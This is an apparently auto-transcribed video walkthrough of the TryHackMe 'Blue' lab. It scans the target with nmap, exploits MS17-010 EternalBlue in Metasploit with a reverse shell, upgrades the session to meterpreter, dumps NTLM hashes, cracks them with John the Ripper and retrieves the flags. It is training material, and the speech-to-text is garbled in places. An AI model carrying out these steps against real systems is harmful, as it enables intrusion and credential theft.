Hello guys, welcome back to my YouTube channel, and this is a complete and full video of the Blue Room on the TryHackMe. Let's start together. Okay, because these scans take a little bit more time, that's why previously I save it, and you can see here I use it nmap -sc and -sv script vulnerable and -on for the save the result, and this is our target IP address. Let's scroll down and okay, we see that there are a few ports open. We also see that this machine is vulnerable to the different exploit, and we even have a link and more information. If you come scroll down, and you can see the SMB vulnerable MS17010 is vulnerable to the remote code execution. Vulnerable is Microsoft. Also, this is our CV 2017-0143, and risks factor is high, and the vertical remote code execution vulnerable excite in Microsoft SMBv1, and this is the server, right? Okay, let's back to answer and question. It say scan the machine. With it you need to write 3 and hit on click on correct answer. And what is the machine vulnerable? Answer in the form of the MS like this example. Okay, just back here, scroll down, and you can find here MS17010, and copy paste here, correct, scroll down, and task 2 is gain access, right? Exploit the machine and gain a foothold, starting up the meta exploit. Okay, just come back here, write MSF console, and it will take a few seconds. With the comment sudo MSF console, also you can bring up the MSF console. Once loaded, I will search on MS17010 with the search command. Search for the MSF 17010, right? Back here, hit an enter, and okay. Interesting, in the first or 0 item in this search result, so I wanted to make use of with this command. Just write use 0 and hit on enter. Okay. Also, you can use the full name of the matching module like this. You can use and copy the full path, come back here, paste, and hit on enter. So you can do that. Okay, from there on we need to see which option we need to set with the show option command, right? Just write show option, hit on enter. You can see the bunch of information here. The very important option we need to set before processing to the next step is the changing the variable of the rhost and the lhost. Also the reset of the option I left as like you can write set rhost, right? Just back here, copy target IP address, bring up the terminal, paste, and hit on enter. Also you can write set. Okay guys, now we need to set our IP address. Just write if config set lhost, and you can write tone 0, so you can copy your IP address, hit on enter. It is successful. Okay, here I have set lhost and tone 0, which is the my VPN network device is connected to the TryHackMe network. Scroll down. Finally, we need to, you can write run or exploit. Okay, something wrong here. It say rhost field. Let me just back here. What's wrong? Let me save more option. Okay, show option again. Set we forgot to write set rhost. Just back here, copy the target IP address, bring up the terminal, paste here, hit on enter, and we can write exploit. Right. Okay, finally execute the exploit with the run or exploit command, which one you like it, and it will try to contact to the target IP address. Okay, let's just back here. What is the next question? Find exploitation code we will run against the machine. What is the full path? This is the full path. Windows exploit Windows SMB MS 17 0tone eternal blue. Just copy that and paste here. Show option and set one required. We already did that. What is the name of the value? It was rhost, and it say set the payload. You need to set payload Windows x64 reverse shell. Also with that, run and exploit we did. Also confirm the exploit, we did that. Okay, what is the next task? Okay, let's back here. Okay, we got metadata access. Just write sysinfo, right? Sysinfo, hit on enter, and you can see the bunch of information. Is a computer name is John, PC operation system is Windows 7, it is built on this, and this is the service. Also you can see x64 and Windows. Okay, what it say? It say this whole section of the escalation and can be complete, escape it, and is not like showing in the walkthrough video. Okay, we can get confirmation with gate system or gate UID. We did that, so we can write gate system, right? And get UID, let's write get UID, and you can see this is our server username. Nice. So we have user right NT or NTLM authority system, which is the perfect. We can also check with the get PID and PC. You can write the PC command, and we see that exploit has been migrated to the very stable explos.exe process, and you can see here. Let me find where is that? It should be here, right? Yeah, we got that. This is the PID for the explos.exe 1300, right? Also let's answer the question. Let's back here, and you say if you haven't already background and previously JNet shell research online, have you canvas shell, metaperator shell, metasploit. What is the name of the post module we will use? We will use the post multi-manage shell, and just back here, write background, and can search for the shell 2, hit on enter, and you can see shell post multi-manage shell to meterpreter, right? Use 0, show option, and you can see here lhost, lport, and session. We need to write our IP address. That's why we need to write if config set lhost and copy the 210 IP address, paste here, hit on enter, and we need to set also session. Set session, just 1 second, sessions, and you can see is ID for the meterpreter is session ID 1. Also we need to set session 1, hit on enter, and you can write exploit, easy exploit, right? Okay, just back here, what was the name of the post module we will use? It is post multi-manage shell to meterpreter. Select these videos. We did that. We set also session, set the required option. You may need a list of the all session to find your target, sure, and run. We did also once the meterpreter shell conversation complete, select the session for use. Of course, we will do that. Let's back here, and it will try to contact to the target IP address. Stop sessions. Okay, you can see we have we got access. Just write session 2, hit on enter, and we have meterpreter access, sysinfo, or get UID also. Okay, NTLM server name is NTLM authority system, which is the perfect. Okay, nice. Okay, let's back here. Okay, system, you can see the question here, and this is the, you don't need the answer. Also, let's back here to crack the hash dump. We need to back meterpreter and write hash dump, Okay, nice. We got the hashes here. We need to copy all hashes, open up new terminal, write sudo, okay, sudo nano hashes, like hash 10.txt, hit on enter, write password, and paste hash dump here. Control X -Y for the save, ls. Okay, cat into hash 10.txt. Awesome. You can see our hashes here for the administrator cast and for the John. Right now we need to crack the these NTLM hashes, and we will do with the John the Ripper or John tool. Also, okay, just 1 second. For the crack the password, you can write John dash format is NTLM and dash word list. In this case, I'm gonna use raku.txt. Actually, I did that, that's why I get error. Okay, but let's back the question. Okay, what is the name of the non-default of user? It was John, and copy this password. copy this password hash, and file researchers have to crack. And what is the cracked password? I was did that. It was ALQFNA 2020. Okay, let's back here. Task 5, find the flag. Okay, we need to find the flag. Flag 1, flag 2, and flag 3. We have a 3 flag here, right? We need to write back here, clear pwd, hit on enter. We are on Windows System 32. You can write shell, right? Okay, now to find the flag, we need to go to the ls. Let's back here, dr cd. Okay, we find the flag 1. You can see here cat flag, flag1.txt. okay, we need to write type. That's my bad. Flag1.txt. okay, we got the flag 1. You need to copy this flag and back here. Yeah, just back here and paste. Hit on correct answer, and we need to find the flag 2. I think directory, cd into users, right? Directory again, cd into John dr, and let's get into desktop. I hope we can find here. No, we couldn't find. Just back here, dir, cd into documents, hit on enter, dir. Okay, we got the flag 3, right? Type flag 3. Flag 3.txt, then enter. This is our flag. Copy that and paste on flag 3 into Windows System 32, cd into config file, dir. Okay, we need to find, yes, we got flag 2.txt. Type flag 2.txt, hit on enter, and this is our flag 2, right? Just back here, copy paste correct answer, and is done. I will see you in the next video.